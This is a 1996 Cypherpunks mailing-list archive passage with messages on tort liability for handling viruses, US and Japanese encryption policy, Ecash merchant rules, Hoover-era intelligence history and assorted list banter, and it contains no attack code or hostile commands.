Content-Type: text/plain


Black Unicorn writes:
>On Wed, 24 Apr 1996, Scott Brickner wrote:
>> I'd argue that I'm holding everyone to the same standard:  either know
>> the safe ways of handling viruses and follow them, or don't handle them
>> at all.
>
>Now you have to get into the question of who is a trained virus handler.
>This is a subjective analysis.  The court is going to have to do this case
>by case.  And below in your message its clear you do not hold everyone to
>the same standard.  The virus/CPR expert is held to a different standard
>in your example.  It is the same standard in that you punish everyone if
>they "Do something stupid."  But "stupid" is different for each person.

I don't agree with this.  I expect everyone who handles viruses to know
what they're doing and take precautions.  By handling the virus at all
you are effectively claiming such expertise, as I see it.  The court
needn't consider formal training at all.  A "reasonable person" ought
to know if his training is adequate, after all.  The court may choose
to examine this claim, and find it to be in error, thus making the
handling of the virus reckless.  If the court accepts the claim, then
it should examine the actual procedures.  If the procedures are found
wanting, there is negligence (though I suspect my "non-legalese" usage
of these terms has them reversed --- negligence is a worse fault, in my
estimation: you had the knowledge but failed to act in accordance with
it; recklessness means you acted without fully appreciating the
consequences, and thus didn't know better.)

>> You seem to imply that I'd hold the untrained virus writer
>> harmless.  No way.  He's reckless and *should* be liable.
>
>I indicated only that the standards you had for trained and untrained
>virus writers were different.

I guess "trained" may have been inappropriate.  How about "knowledgable"?

>> When one has
>> training, it's no longer reckless to simply handle (or write) the
>> virus, but disregarding safe procedures is negligent.
>
>See my above position.  Three standards.  One for those with training,
>one for those without and some kind of standard for determining what is
>'enough' training.  Given the traditional institutional costs of courts,
>particularly their 'catch up' chase with technology, I don't think I'd
>want courts doing these calculations.

Formal training implies that one is knowledgable, but such knowledge
may be acquired without formal training (or new fields would never come
about).  Certain actions are clearly acceptable for knowledgable people
but are dangerous for those without the knowledge --- handling a
biological virus is one of them.

The court need to nothing more than determine whether the precautions
were adequate.

>> It seems to me that the "reasonable person" isn't the real issue
>> there.  Someone with training ought to be expected to do the "right"
>> thing.  If you're trained to administer CPR, and you do it *wrong*, you
>> shouldn't be absolved of liability -- you're negligent.
>
>But the other argument goes that we have to give the people who know what
>they are doing more leeway because they will be judged by people who don't
>know about the subject and because if we want to encourage good samaritans
>the way to do it is not by increasing their liability.  (You effectively
>do increase their liability above by implying that you would like to
>impose a stricter negligence standard for trained CPR types).

I'm not sure I'm imposing stricter negligence on trained CPR types, see
my comments below.  What I *am* doing is imposing a stricter
recklessness standard on untrained types.

>Keep in mind that doing the "wrong" thing isn't always negligence either.
>Doing the wrong thing because you were careless, that's negligence.

Doing the wrong thing willfully is reckless or even malicious.

>Also note that you can be negligent without harming anyone.

But is it actionable?  Doesn't the law have a sort of "no harm, no
foul" interpretation?  According to Holmes, if I believe that an enemy
is trying to kill me, and I arrange things so that when he thinks he's
shooting me, he's really shooting a mannekin, he has *not* committed
attempted murder.  Similarly, if a pickpocket puts his hand in my
pocket, but there's nothing there, he hasn't committed a crime.

>It could be argued that it's folly to impose a lower standard on the CPR
>'idiot' and thus encourage him to run out and do CPR.  One can imagine a
>scene where the CPR trained fellow pulls an idiot out of the crowd and
>gives instructions for the idiot to preform the CPR so as to take
>advantage of both his increased knowledge and the idiot's limited
>liability (reasonable person standard, not reasonable CPR expert
>standard).

The expert shouldn't get reduced liability for this.  The 'idiot' is
effectively a tool in the expert's hands.  Too, the 'idiot' has no
way of assuring himself that the supposed expert is, in fact, qualified.
It's no more appropriate for him to administer CPR under the guidance
of a stranger than to do it on his own judgement.

>> If you don't
>> know anything about CPR (except what you've seen on "Baywatch"), then
>> we're back to what a "reasonable person" should do.
>
>That probably includes not trying to preform CPR... no?

Dunno.  Is it "reasonable" for an untrained person to attempt CPR?  That's
for a court to decide.

>> If you're trained
>> and you do it right, but the person is still injured by your actions,
>> limiting your liability is society's way of encouraging you to use
>> your training for the common good.
>
>This begins to look like the partial abortion debate, where the argument
>goes something like this:
>
>Yes, it's criminal to preform the procedure, but you can absolve yourself
>after the fact by showing us (medical morons) that the mother's life was
>in danger.
>
>That's not encouraging in the least to doctors.  (Which in the abortion
>example, is precisely the point).
>
>The trick is in your concept of "and you do it right."  That's a
>subjective analysis.

Actually, I'd say the error in this abortion argument is that there's
a presumption of guilt, which runs counter to a basic tenet of common
law.

In the virus case, I'd expect the plaintiff/prosecutor to prove that
the precautions were inadequate.  Not merely that they were ineffective
in the specific case, but that a "reasonable person" would have known
the activity to be dangerous without adequate precautions, and that a
"resonable expert" would have considered the precautions taken
inadequate.  Without such proof, the defendant need only indicate
what precautions were taken, and claim that they are adequate.

>> In my mind, the difference between the objective standard and the
>> subjective one marks the difference between recklessness and
>> negligence.  If an objective "reasonable person" wouldn't do it, it's
>> reckless.  If a subjective "reasonable person" wouldn't, it's
>> negligent.
>
>This makes it REALLY tough.  Reckless usually means extensive punative
>damages are on the way.  Simple negligence doesn't always trigger them.
>By using these terms on the same facts the idiot gets simple negligence,
>the expert gets expanded liability and potential punative damages.

I see it the other way around.  The "objective" reasonable standard
says "don't handle the virus unless you're and expert".  Handling the
virus and being found incompetent to do so (the idiot case) means
you're reckless and subject to those punitive damages.  Being found
competent to handle them and found not to have taken adequate steps
leaves you at least negligent, but reckless if it wasn't accidental.
Competent with adequate precautions means you weren't even negligent.

>Because the expert will be at significant disadvantage at trial (if he's
>an expert, if he knew what he was doing, why did the victim get hurt) what
>you've done is moved closer to the realm of strict liability for all
>experts. (Strict liability simply eliminates the negligence calculation.
>If you were doing the activity, (CPR) and someone got hurt, you're liable.
>Period.  No calculation of fault).  What this system does is create
>something like a rebuttable presumption of negligence on the expert.  That
>starts to look like strict liability.

Precautions don't necessarily eliminate danger, they simply reduce it
to acceptable levels.  Licensed drivers are, in some sense, driving
experts.  Why do they get in accidents?  Often because of liability,
but often there are merely unpredictable circumstances --- junk in the
road, sudden ice storms, etc.  The burden of proving negligence must
remain with the one claiming injury.

>> Perhaps these aren't the "legalese" usages of the terms, but it seems
>> reasonable to me.
>
>It creates systemic problems though.  (Like the burden of overcoming the
>assumption that the expert must have erred).

It's a faulty assumption, and a common law court ought to stick to its
philosophical origins --- innocent until proven guilty.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Wed, 24 Apr 1996 17:48:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: The Iron Mountain Report
Message-ID: <v02140b00ada47b37a48c@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>Some years ago the federal government set up a special
>[inaudible] group. For two-and-a-half years they met in secret at
>Iron Mountain, New York. Their findings were called "Report from
>Iron Mountain on the Possibility and Desirability of Peace."
>Their document, by some of the leading thinkers, was suppressed.
>Later, it was printed in a limited edition, with the *names*
>removed. Some were shocked by what they read.
>

I've read the Report from Iron Mountain (I bought it about 20
years ago, and I believe that it's currently available in
paperback). While it *could* be legitimate, I think it may be
more approprately filed next to Johnathan Swift's Irish cookbook.

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 17:52:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Crypto Software Review Wanted
Message-ID: <ada419df11021004f390@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 PM 4/24/96, Travis Hassloch x231 wrote:
>There's a ton of only semi-organized stuff out there.
>I would like structured info... more that just a filename, without having
>to install it myself, etc...
>Review of the packages would be real nice.

Let's see. You'd like structured info, and reviews.

How much are you offering?


>CC me in the replies please, since I'm not on the list...

Well, I make it a point _not_ to do this. Those wanting people on the CP
list to generate stuff for them should at least be reading and contributing
to the list.

"Hey, like I'm not on the list, but, like, send me kewl stuff."

> although I might get on coderpunks if the volume is small.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Wed, 24 Apr 1996 14:17:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Separate but equal" as a racist doctrine
In-Reply-To: <199604240441.AAA07568@pipe5.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.960424175845.18742A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, tallpaul wrote:

> People who wish to organize for racist ideology behind this doctrine while
> proclaiming they are not racists merely place themselves in the old racist
> camp. Their organizing for (and their denials of) racist ideology does not
> make them less racist, just less honest. 

I agree that separatism smells of true racism.

Perhaps it's no use trying to adhere to the original interpretation
of the term racism, since it has broadened with time to include
everyone who is not a strong supporter of affirmative action and
such. But debatings would gain from a strict definition of racism:
Believing that races are significantly genetically different visavi
intelligence or moral standards. I regard myself as not the slightest
racist (if a Bantu is adopted into Swedish culture as an infant he
becomes a Swede, regardless of skin colour) but a bit of a _culturist_:
Believing that all cultures are _not_ equal in terms of collective
intellectual inheritage and moral standards. Currently, the politically
correct refuse to distinguish between racism and culturism, thus
confusing a lot of issues.

Asgaard

PS The supreme culture is the Nordic, pre-Christian anarchy, of course.
:-) 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 24 Apr 1996 19:52:28 -0700 (PDT)
To: wb8foz@nrk.com
Subject: Re: EYE_suk
In-Reply-To: <199604241938.PAA07049@nrk.com>
Message-ID: <o2tfx8m9LwLL085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199604241938.PAA07049@nrk.com>,
David Lesher <wb8foz@nrk.com> wrote:

> > > (BTW, it's worth wondering what restrictions there'd be if it were
> > > not for an ENORMOUS turf battle between them & Jill Edgar Hoover.)
> > 
> > Or, if Hoover had won that battle and acquired control of foreign 
> > intelligence, just how much more like Lavrenti Berya he would have 
> > become.
> 
> Hoover did win, AFAICAT. He got domestic contelpro.
> James Jesus was shut out....
> 
> FI? I doubt anyone outside of JEH ever thought he'd get that.

He *had* some FI, in Central and South America, during the war.  During
the war he worked assiduously to undermine Wild Bill Donovan and the OSS
and succeeded in having that organization eliminated in September 1945.  

Upon doing so he immediately presented a plan to Attorney General Tom 
Clark for expanding the FBI's South American intelligence network
worldwide.  The spook community counterattacked and persuaded Harry
Truman to reign the FBI back, eliminating its foreign activities
entirely and clearing the path for the creation of the CIG (later CIA)
in 1946.  Hoover's only victory in this debacle was his preventing
his arch-rival Donovan from heading the new agency.

(See Curt Gentry's J. EDGAR HOOVER: THE MAN AND THE SECRETS, Norton,
1991, pp. 326-27)

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMX7h/OVevBgtmhnpAQE5YgL/SJqk2Lp8cQOr3ajrF8tMbLq0b2be1pCj
eY9qWagdZSpfQIzPrfkSIOU/KIJuokfTJpIpftWS71wt8OYDXXPIG4lvXoghbhQU
Gm0T/z7k+nV/oLhkeOiH87xG95NMUvCP
=jrEw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 24 Apr 1996 14:38:13 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: You have been deleted
Message-ID: <199604241904.MAA20012@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


To: Black Unicorn <unicorn@schloss.li>
From: attila <attila@primenet.com>
Reply-To: attila <attila@primenet.com>
Subject: Re: "You have been deleted"

Addressed to: Black Unicorn <unicorn@schloss.li>
              Tim May <tcmay@got.net>

** Reply to note from Black Unicorn <unicorn@schloss.li> 04/24/96  
03:01am -0400 
 
 
= On Tue, 23 Apr 1996, Timothy C. May wrote: 
=  
= > its route and landed on my hill, abducting me for medical  
experiments I am 
= > too embarrassed to describe (except that Chelsea was also  
involved). I am 
= > back now, albeit subtly changed (for the better). 
=  
= That a medical experiment including Chelsea could improve a man is  
beyond 
= the bounds of reason. 
=  
= Mr. May, are you making this up? 
=  
    attila sez:

	Not necessarily. it may be speculation or wishful thinking on  
the part of Chelsea, or even Bubba and Hillary.



-- 
 Obscenity is a crutch for inarticulate motherfuckers.
 Fuck the CDA!

cc: Tim May <tcmay@got.net>
    Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 16:23:09 -0700 (PDT)
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: [NOISE- Legal Theory] Reasonable people
In-Reply-To: <199604242243.SAA22982@universe.digex.net>
Message-ID: <Pine.SUN.3.93.960424184735.3252D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Scott Brickner wrote:

> Black Unicorn writes:

> >On Wed, 24 Apr 1996, Scott Brickner wrote:

> >> I'd argue that I'm holding everyone to the same standard:  either know
> >> the safe ways of handling viruses and follow them, or don't handle them
> >> at all.
> >
> >Now you have to get into the question of who is a trained virus handler.
> >This is a subjective analysis.  The court is going to have to do this case
> >by case.  And below in your message its clear you do not hold everyone to
> >the same standard.  The virus/CPR expert is held to a different standard
> >in your example.  It is the same standard in that you punish everyone if
> >they "Do something stupid."  But "stupid" is different for each person.
> 
> I don't agree with this.  I expect everyone who handles viruses to know
> what they're doing and take precautions.  By handling the virus at all
> you are effectively claiming such expertise, as I see it.  The court
> needn't consider formal training at all.  A "reasonable person" ought
> to know if his training is adequate, after all.  The court may choose
> to examine this claim, and find it to be in error, thus making the
> handling of the virus reckless.  If the court accepts the claim, then
> it should examine the actual procedures.

As I understand it, your test goes like this:

Is handler an "expert"?

Yes?  :  Examine procedures to determine liability.

No?   :  Handler is liable.

That's two standards.  One standard of strict liability (for the
non-expert) and one of negligence (for the expert).

> If the procedures are found
> wanting, there is negligence (though I suspect my "non-legalese" usage
> of these terms has them reversed --- negligence is a worse fault, in my
> estimation: you had the knowledge but failed to act in accordance with
> it; recklessness means you acted without fully appreciating the
> consequences, and thus didn't know better.)

Other way around.  Negligence is milder.  Negligence is merely the absence
of due care.

Recklessness:  The state of mind accompanying an act, which either pays no
regard to its probably or possibly injurious consequences, or which,
though forseeing such consequences, persists in spite of such knowledge.
Recklessness is a stronger term than mere or ordinary negligence...
Black's Law Dictionary 6d., (1990).

> >> You seem to imply that I'd hold the untrained virus writer
> >> harmless.  No way.  He's reckless and *should* be liable.
> >
> >I indicated only that the standards you had for trained and untrained
> >virus writers were different.
> 
> I guess "trained" may have been inappropriate.  How about "knowledgable"?

Ok.  The standards you have created for knowledgeable and unknowledgeable
people are different.  My key objection to your position was your view
that it was 1> an objective determination and 2> a single standard.  It is
neither.

> >See my above position.  Three standards.  One for those with training,
> >one for those without and some kind of standard for determining what is
> >'enough' training.  Given the traditional institutional costs of courts,
> >particularly their 'catch up' chase with technology, I don't think I'd
> >want courts doing these calculations.
> 
> Formal training implies that one is knowledgable, but such knowledge
> may be acquired without formal training (or new fields would never come
> about).  Certain actions are clearly acceptable for knowledgable people
> but are dangerous for those without the knowledge --- handling a
> biological virus is one of them.
> 
> The court need to nothing more than determine whether the precautions
> were adequate.

Adequate for who?  You've already said that the court has to determine if
someone is knowledgeable first.  (And thus in your test bypass the
automatic finding of liability).  This is a very complicated test you're
designing.

> I'm not sure I'm imposing stricter negligence on trained CPR types, see
> my comments below.  What I *am* doing is imposing a stricter
> recklessness standard on untrained types.

Above you say "Someone with training ought to be expected to do the
'right' thing."  That sounds like a stricter standard on CPR types.  i.e.,
someone without training ought not to be expected to do the right thing.
In this good faith helper at the side of the road example, do you want to
punish the CPR type for doing his best despite his ignorance?  (You might,
I'm just trying to clarify your position, which seems internally
inconsistant to me).

> >Keep in mind that doing the "wrong" thing isn't always negligence either.
> >Doing the wrong thing because you were careless, that's negligence.
> 
> Doing the wrong thing willfully is reckless or even malicious.

I didn't know you ment willfully.  I don't see that anywhere.

> >Also note that you can be negligent without harming anyone.
> 
> But is it actionable?  Doesn't the law have a sort of "no harm, no
> foul" interpretation?

No.  Not exactly.  It's more of a "wrong without a remedy" deal.

> According to Holmes, if I believe that an enemy
> is trying to kill me, and I arrange things so that when he thinks he's
> shooting me, he's really shooting a mannekin, he has *not* committed
> attempted murder.  Similarly, if a pickpocket puts his hand in my
> pocket, but there's nothing there, he hasn't committed a crime.

Both of those are crimes today.

> >It could be argued that it's folly to impose a lower standard on the CPR
> >'idiot' and thus encourage him to run out and do CPR.  One can imagine a
> >scene where the CPR trained fellow pulls an idiot out of the crowd and
> >gives instructions for the idiot to preform the CPR so as to take
> >advantage of both his increased knowledge and the idiot's limited
> >liability (reasonable person standard, not reasonable CPR expert
> >standard).
> 
> The expert shouldn't get reduced liability for this.  The 'idiot' is
> effectively a tool in the expert's hands.  Too, the 'idiot' has no
> way of assuring himself that the supposed expert is, in fact, qualified.
> It's no more appropriate for him to administer CPR under the guidance
> of a stranger than to do it on his own judgement.

The point is that allowing that disparity seems silly.
 
> >> If you don't
> >> know anything about CPR (except what you've seen on "Baywatch"), then
> >> we're back to what a "reasonable person" should do.
> >
> >That probably includes not trying to preform CPR... no?
> 
> Dunno.  Is it "reasonable" for an untrained person to attempt CPR?  That's
> for a court to decide.

But under your test it doesn't matter.  He didn't know how to attempt CPR,
he's liable.

> >> If you're trained
> >> and you do it right, but the person is still injured by your actions,
> >> limiting your liability is society's way of encouraging you to use
> >> your training for the common good.
> >
> >This begins to look like the partial abortion debate, where the argument
> >goes something like this:
> >
> >Yes, it's criminal to preform the procedure, but you can absolve yourself
> >after the fact by showing us (medical morons) that the mother's life was
> >in danger.
> >
> >That's not encouraging in the least to doctors.  (Which in the abortion
> >example, is precisely the point).
> >
> >The trick is in your concept of "and you do it right."  That's a
> >subjective analysis.
> 
> Actually, I'd say the error in this abortion argument is that there's
> a presumption of guilt, which runs counter to a basic tenet of common
> law.

And in your test there is a presumption of fault on the non-expert.  If he
did everything right purely by accident or from what he saw on "baywatch"
and the victim dies anyway, under your test he's cooked.

> In the virus case, I'd expect the plaintiff/prosecutor to prove that
> the precautions were inadequate.  Not merely that they were ineffective
> in the specific case, but that a "reasonable person" would have known
> the activity to be dangerous without adequate precautions, and that a
> "resonable expert" would have considered the precautions taken
> inadequate.  Without such proof, the defendant need only indicate
> what precautions were taken, and claim that they are adequate.

Woah.  Ok.  So you want a reasonable person determination of the activity
and if the activity falls within a dangerous defintion.  (This is called
ultrahazardous activity in tort law).  Then you want strict liability on a
non-expert who engages in that activity, and a "reasonable expert"
standard on the expert who engages in that activity?

Putting aside for a moment my already voiced concerns, doesn't the idea of
having a "reasonable person" standard on the classification of an
ultrahazardous activity seem silly?  Does nuclear physics seem dangerous
to Joe Sixpack?  What about Cold Fusion experimentation?  Microwave
repair?  Seems there's a tremendous opportunity for error in that kind of
standard.  It also has the effect of making the scope of the definition of
"ultrahazardous" very large.  The larger it is, the more interference and
common law regulation you're going to have on the economy.  _Particularly_
so where you are imposing a strict liability standard.
 
> >This makes it REALLY tough.  Reckless usually means extensive punative
> >damages are on the way.  Simple negligence doesn't always trigger them.
> >By using these terms on the same facts the idiot gets simple negligence,
> >the expert gets expanded liability and potential punative damages.
> 
> I see it the other way around.  The "objective" reasonable standard
> says "don't handle the virus unless you're and expert".  Handling the
> virus and being found incompetent to do so (the idiot case) means
> you're reckless and subject to those punitive damages.  Being found
> competent to handle them and found not to have taken adequate steps
> leaves you at least negligent, but reckless if it wasn't accidental.
> Competent with adequate precautions means you weren't even negligent.

Just legally, an objective standard is when you hold everyone to a
reasonable person standard.  Everyone is Joe Blow.  Would Joe Blow have
done this that or the other thing.  As soon as you start talking "experts"
you're out of the objective field.

> >Because the expert will be at significant disadvantage at trial (if he's
> >an expert, if he knew what he was doing, why did the victim get hurt) what
> >you've done is moved closer to the realm of strict liability for all
> >experts. (Strict liability simply eliminates the negligence calculation.
> >If you were doing the activity, (CPR) and someone got hurt, you're liable.
> >Period.  No calculation of fault).  What this system does is create
> >something like a rebuttable presumption of negligence on the expert.  That
> >starts to look like strict liability.
> 
> Precautions don't necessarily eliminate danger, they simply reduce it
> to acceptable levels.  Licensed drivers are, in some sense, driving
> experts.  Why do they get in accidents?  Often because of liability,
> but often there are merely unpredictable circumstances --- junk in the
> road, sudden ice storms, etc.  The burden of proving negligence must
> remain with the one claiming injury.

Then why impose it without an examination into fault on non-experts?  In
your test the non-expert bears the burden of showing he's an expert if he
wishes to prevail.  The victim need only say "He was doing CPR, I got
hurt, he's a non-expert."  Wham, liability under your test.  That's not a
burden at all.  It's certainly not a burden of showing negligence.

> >> Perhaps these aren't the "legalese" usages of the terms, but it seems
> >> reasonable to me.
> >
> >It creates systemic problems though.  (Like the burden of overcoming the
> >assumption that the expert must have erred).
> 
> It's a faulty assumption, and a common law court ought to stick to its
> philosophical origins --- innocent until proven guilty.

Or under your test, liable until proven expert.

As for faulty assumptions, go to court someday.  They are common.
In designing systems one _must_ assume them.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Apr 1996 19:56:03 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: crypto in .ja (fwd)
Message-ID: <m0uCGuD-0009OsC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 PM 4/24/96 -0400, David Lesher wrote:
>Forwarded message:
>
>X-URL: http://www.us.net/~steptoe/276915.htm
> 
>> Emerging Japanese Encryption Policy
>> 
>> By Stewart A. Baker 
>{}
>> Summary: The emerging Japanese consensus on cryptography
>

quoted from article:

>In the United States and Europe, encryption policy is formed by a mix of 
>interests.  Advocates of business, national security agencies, and more 
>recently the police -- all play a large role in the policy debate.  

Notice that Stewart Baker didn't include as one of those groups, "The 
public."  In a typical Freudian slip, he reveals that the interests of the 
public don't seem to count for much, according to government-types like he 
used to be.

>And Japanese police face severe political and constitutional constraints on 
>wiretapping, so the prospect of losing this criminal investigative tool 
>seems not to be as troubling to the Japanese government as to the United 
>States and many European nations.

Why is it that I suspect that there are no greater "constitutional 
restraints" on wiretapping in Japan; just more concern to maintaining 
constitutional behavior?


>Others suggested that the solution was to have two levels of encryption -- 
>reserving the most powerful 
>for government and national security while encouraging commercial encryption 
>standards that are less strong.  This approach, however, has proven to be a 
>dead end in the United States, where any cryptographic strength deemed 
>exportable has immediately been condemned as insufficient by business and 
>cryptography experts.

More distortions.  Baker tries to imply that the decision on what is 
exportable bears no relationship to what is considered sufficient, whereas 
in fact we know that export approval practically requires an insecure system.

>All in all, the emerging Japanese consensus on cryptography could pose a 
>major challenge to U.S. (and perhaps European) government hopes of striking 
>a compromise between commercial and governmental interests with respect to 
>cryptographic policy.  


He continues to ignore public interest...  And lest he try to imply that 
government represents that "public interest," I should hasten to add 
"individual interest."

>If Japan puts the weight of its government and industry behind strong, 
>unescrowed encryption, competitive pressure will quickly doom any attempt to 
>influence this technology through export controls and standard-making.  
>Governments will be forced to choose between overt regulation in the Russian 
>and French manner or laissez-faire policies of the sort that now prevail in 
>the domestic markets of countries like the United States, Great Britain, and 
>Germany.

I would hardly characterize the US's policy towards encryption as "laissez 
faire."  The moment the patents on public-key encryption were granted, that 
presented a substantial impediment towards the use of that system by the 
public.  That ain't "laissez faire"!  The act of proposing Clipper was 
intended to deter competing systems of unescrowed encryption.  That ain't 
"laissez fair."


>Whether Japanese policy will in fact coalesce around a purely commercial 
>approach to cryptography remains to be seen.  In response to the analysis 
>above, one senior MPT official stated that the U.S. and European concerns 
>had not been well understood in Japan until the OECD meeting and that the 
>MPT's study group would be giving special importance to the issue in its 
>review of electronic payment systems.  Thus, it is apparently still 
>possible that Japan will join with the U.S. and European governments in 
>seeking to shape a more accessible encryption standard.


A "more accessible encryption standard"?   War is peace.  Freedom is 
slavery.  Plaintext is encrypted.
 

>Because the same key pair may be used for encryption as for signature, 
>escrowing signature keys would also allow access to encrypted communications 
>that use the same key pair. The problem with this approach is that it would 
>also add a layer of insecurity to the entire digital signature structure, 
>allowing those with access to the escrow system not just to decrypt but also 
>to forge messages from registered users.  Since there is little 
>law-enforcement reason for being able to conduct such forgeries, adding this 
>layer of insecurity has been rejected in U.S. policy circles. 


"Little law enforcement reason"???  Uh, pardon me, but could you mention 
what that little reason is?


>While MITI formally supports discussions of cryptography policy on an 
>international basis, the Clipper Chip was highly unpopular in Japan for a 
>variety of reasons.  There's a strong antipathy to wiretaps among the 
>Japanese people.  Wiretaps are lawful with a warrant, but remain 
>controversial.  Therefore, the Clipper Chip's law 
>enforcement rationale did not resonate in Japan. 

What Baker forgot to say is that there may be an equally strong antipathy to 
wiretaps among Americans, according to polls I've heard of. The difference 
is, the people aren't getting their way WRT wiretaps.   And the Clipper 
proposal was DOA here, as well.

Jim Bell
jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 24 Apr 1996 17:02:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (fwd) Statement on Merchants - Mark Twain Banks
Message-ID: <v0300660cada46eba2372@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I knew it!

There *is* an echo in here...

;-).

Cheers,
Bob Hettinga

--- begin forwarded text


X-Sender: merchant@172.16.1.10
Mime-Version: 1.0
Date: Wed, 24 Apr 1996 14:16:17 -0500
To: ecash@digicash.com
From: Ecash Merchants <merchants@marktwain.com>
Subject: Statement on Merchants - Mark Twain Banks
Sender: owner-ecash@digicash.com
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

Ecash - Its Your Money!

Mark Twain Bank both supports and promotes free speech.  Our adoption
of the Ecash secure payment system written by DigiCash is one of the
most important statements we think we can make about our belief in
privacy.  We believe that all sites should have the ability to publish
or promote as they choose, and to do business with whom they choose.

Mark Twain is a public company regulated by multiple governmental
entities.  In the ordinary course of business, the company chooses
with whom it does business every day. The company has no obligation to
                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
conduct business with anyone it deems to be inappropriate.  The
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;-).
company will decline to accept any web site that sells graphics or
items that would, in the sole and conservative judgement of the Bank,
be offensive to the primary constituents of the Bank and other online
vendors. Defining what is acceptable is an ongoing process of the
Bank's Oversight Review Committee. Anyone with questions about
specific acceptability should contact the committee by email.

At this time the regulatory framework for Ecash and other online
payment mechanisms is not established.  We expect that we will be
required to present the case for this new payment mechanism before
legislative and regulatory bodies.  This means that the ultimate
success of Ecash will depend, in part, on our ability to provide
regulatory bodies with a rational argument why current restrictive
regulations should be broadened.  If opposing parties are able to
divert the discussion away from these essential elements into an
argument about controversial products that may be available, then the
goal of universal acceptance may not be met.

As banks from around the world adopt Ecash, customers will be able to
use their Mark Twain issued Ecash to make purchases globally without
restriction.  Mark Twain believes that all Ecash issuing banks should
be inter-operable, and that such purchase transactions are private
matters of the individuals utilizing Ecash.  One could certainly
imagine that merchants not acceptable to Mark Twain could be
acceptable elsewhere.

Thank you for your patience, and your comments.

Mark Twain Bank
merchants@marktwain.com
www.marktwain.com

"Ecash" is a trademark of DigiCash bv
"Mark Twain Banks" is a trademark of
 Mark Twain Bancshares, Inc.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMX59ttsWVQQCavb7AQGnwQP+PedLsJjUsdiZ+XW8qoyTmWjBtFGVBnqE
sOkVm9ZFPK/Sgny13iYJdjyjpNe/XgFaQO8hSfV1aZyBln4U3pFhH9aIqJzAyFmU
Fo9iyLXf3CowWRYieI0OXzG5xYk+nQPKLJLeCdwebxit1bS7m/5iYuASyF3DQs3x
fs7X94LQHeg=
=0vvc
-----END PGP SIGNATURE-----

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Apr 1996 17:15:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Rabbi Hier Testimony
Message-ID: <199604250015.UAA15015@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   To see today's WaPo about "The Turner Diaries" publishing
   controversy that Declan cites:

   TUM_ult


   For William Pierce, "Diaries" author, by NYT, June, 1995:

   TUR_ner








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 17:37:50 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
In-Reply-To: <ada3a446010210045243@[205.199.118.202]>
